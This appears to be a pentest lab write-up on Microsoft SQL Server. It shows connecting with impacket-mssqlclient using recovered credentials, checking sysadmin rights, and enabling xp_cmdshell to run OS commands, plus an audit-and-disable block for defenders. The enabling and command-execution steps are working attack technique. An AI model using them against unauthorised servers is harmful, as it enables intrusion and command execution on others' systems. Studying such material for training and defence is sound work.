MS-SQL (Microsoft SQL Server)

What is MS SQL?

MS SQL, also known as Microsoft SQL Server, is a relational database management system (RDBMS) developed by Microsoft.

Default MS-SQL System Databases

  • master Database: Records all the system-level information for an instance of SQL Server.

  • msdb Database: used by SQL Server Agent for scheduling alerts and jobs.

  • model Database: used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards.

  • Resource Database: a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.

  • tempdb Database: a work-space for holding temporary objects or intermediate result sets.

Listens on TCP port 1433 by default (database engine), with the SQL Server Browser service on UDP port 1434.

Enumeration

Using Impacket

Using impacket-mssqlclient we can connect to the MS-SQL service with a username and password, for example credentials recovered from a publicly accessible production .dtsConfig file (an SSIS package configuration). The -windows-auth flag selects Windows authentication for the domain account:

impacket-mssqlclient ARCHETYPE\sql_svc@10.129.95.187 -windows-auth

Check user access control

SELECT is_srvrolemember('sysadmin');

If it returns 1, the login is a member of the sysadmin server role, which is the privilege needed to enable xp_cmdshell and run OS commands through it.

Exploitation

Command execution via xp_cmdshell()

Once connected to the SQL instance, check whether the xp_cmdshell extended procedure can be used:

EXEC xp_cmdshell 'net user';

Successful execution would produce an output similar to this:

output
-----------------------------------------------------------------------------
NULL
User accounts for \\ARCHETYPE
NULL
------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
sql_svc                  WDAGUtilityAccount
The command completed successfully.

However, if we get the following ERROR, xp_cmdshell is turned off at the instance level and has to be enabled through sp_configure before it can be used:

[-] ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

Alternatively, you can check it using the following query/command.

sp_configure;

It gives an output like the one shown below: config_value is the configured setting and run_value is the value currently in effect. The same table lists the configuration values of the other server options as well.

name                              minimum   maximum config_value  run_value
--------------------------------- -------  -------- ------------ -----------
access check cache bucket count     0         65536          0             0
access check cache quota            0    2147483647          0             0
Ad Hoc Distributed Queries          0             1          0             0
........
........
user options                        0         32767          0             0
xp_cmdshell                         0             1          0             0

Reconfiguration steps

One line command (impacket-mssqlclient)

impacket-mssqlclient has a built-in one-liner that does the honours for us:

enable_xp_cmdshell

Alternative

  1. If 'show advanced options' is already enabled, the xp_cmdshell option can be set directly (skip to step 5). The quickest way to find out is to run the command in step 5.

  2. If we get the error shown below:

[-] ERROR(ARCHETYPE): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.

then 'show advanced options' has to be set to TRUE with:

EXEC sp_configure 'show advanced options', 1;

  3. Apply the change with the RECONFIGURE command:

RECONFIGURE;

  4. Check that sp_configure now lists the advanced options (xp_cmdshell should appear in the output):

sp_configure;

  5. Allow xp_cmdshell() with:

EXEC sp_configure 'xp_cmdshell', 1;

  6. Run RECONFIGURE again so the xp_cmdshell setting takes effect, then test whether it works with the diagnosis command above (EXEC xp_cmdshell 'net user';).
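As an added defender-side counterpart to the enabling steps above (not part of the original notes), the T-SQL below audits the two sp_configure settings the procedure toggles, lists the logins that hold sysadmin (the role checked earlier with is_srvrolemember), and reverses the enabling sequence; it assumes a sysadmin connection to the instance under review.

```sql
-- Added example (not from the original notes): audit and revert the
-- xp_cmdshell configuration on an instance. Assumes a sysadmin session.

-- 1. Current state of the two options. value_in_use is the running value
--    (sp_configure's run_value); value is the configured value.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Who could (re-)enable it: every member of the fixed server role
--    sysadmin, i.e. the logins for which is_srvrolemember('sysadmin') = 1.
SELECT sp.name AS login_name, sp.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r  ON r.principal_id  = rm.role_principal_id
JOIN sys.server_principals AS sp ON sp.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- 3. Reverse the enabling sequence: advanced options must be visible to
--    touch xp_cmdshell, so expose them, turn the procedure off, then hide
--    them again. Each sp_configure change needs RECONFIGURE to take effect.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Confirm: value_in_use should now be 0 for xp_cmdshell.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
```

Disabling xp_cmdshell only removes the shortcut: any login returned by the sysadmin query can re-enable it with the same sequence, so that membership list is the finding to act on.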

Once enabled, xp_cmdshell can be called directly from the impacket-mssqlclient prompt:

SQL> xp_cmdshell "whoami"

The sample output is as follows:

output
--------------------------------------------------------------------------------
archetype\sql_svc
NULL
